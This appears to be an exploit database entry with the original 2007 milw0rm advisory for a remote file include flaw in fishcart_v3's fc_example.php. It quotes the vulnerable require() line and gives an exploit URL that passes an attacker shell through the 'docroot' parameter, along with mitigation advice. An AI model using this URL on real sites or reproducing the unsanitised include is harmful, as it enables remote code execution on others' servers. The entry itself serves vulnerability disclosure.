fishcart_v3 (fc_example.php) Remote File Include Vulnerability

vendor:

fishcart_v3

by:

k1n9k0ng

5.5

CVSS

MEDIUM

Remote File Include

CWE

Product Name: fishcart_v3

Affected Version From: Unknown

Affected Version To: Unknown

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2007

fishcart_v3 (fc_example.php) Remote File Include Vulnerability

This is a vulnerability in the fishcart_v3 script where an attacker can include a remote file by manipulating the 'docroot' parameter in the fc_example.php file. This can lead to remote code execution.

Mitigation:

To mitigate this vulnerability, it is recommended to update the fishcart_v3 script to the latest version and ensure that user input is properly validated and sanitized before being used in file inclusion functions.

Source

Exploit-DB raw data:

fishcart_v3 (fc_example.php) Remote File Include Vulnerability

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Scripts            : fishcart_v3
Discovered By : k1n9k0ng
Scripts site      :
http://fishcart.org/fc_installer_snap_2007_08_03.zip
http://fishcart.org/fishcart_snap_2007_08_03
http://fishcart.org/fishcart_snap_2007_08_03.tgz

Thanks To       : #sekuritionline, #semprol, #mimid, #r.i.p, #x-code, #yogyafree
special To       : adhietslank, babypunk, bugs_, cyberlog, cah_gemblunkz
site                 : www.sekuritionline.net
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

bug Script:
<?php require($docroot.'/FCDIRECTORY/fc_functions/fc_functions.php'); ?>

bug found:
"/fishcart_v3/fc_functions/fc_example.php?docroot=[shell]"

# milw0rm.com [2007-08-08]